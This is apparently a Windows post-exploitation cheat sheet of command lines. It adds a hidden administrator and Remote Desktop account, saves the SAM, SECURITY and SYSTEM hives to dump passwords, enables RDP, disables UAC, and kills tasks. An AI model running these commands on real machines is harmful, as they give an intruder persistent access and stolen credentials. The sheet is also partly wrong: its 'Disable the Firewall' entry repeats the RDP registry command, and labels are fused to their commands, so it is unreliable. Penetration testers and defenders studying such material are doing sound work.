Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" username /ADD

Tasks / Services

  • Start or stop a servicenet start|stop servicename
  • View the currently running tasklisttasklist
  • Kill a task by nametaskkill /F /IM task.exe
  • Kill a task by PIDTaskkill /PID PID /F

Base64 encoding / decoding

  • base64 encodecertutil -encode inputfile outputfile
  • base64 decode
    cmd certutil -decode inputfile outputfile

Dump passwords

  • via reg.exereg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system

Security settings

  • Allow RDPreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Disable UACreg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
  • Refresh policiesgpupdate /force
  • Disable the Firewallreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Variables

  • Show all variablesset
  • Windows TEMP folder
    %TEMP%
  • Current domain and user (if whoami is not available)echo %USERDOMAIN%\%USERNAME%

Location of files

  • Repair files like SAM
    c:\windows\repair\
  • Windows TEMP folder
    %TEMP%
  • Search for a specific file (wildcards are supported)dir /S /P "filename"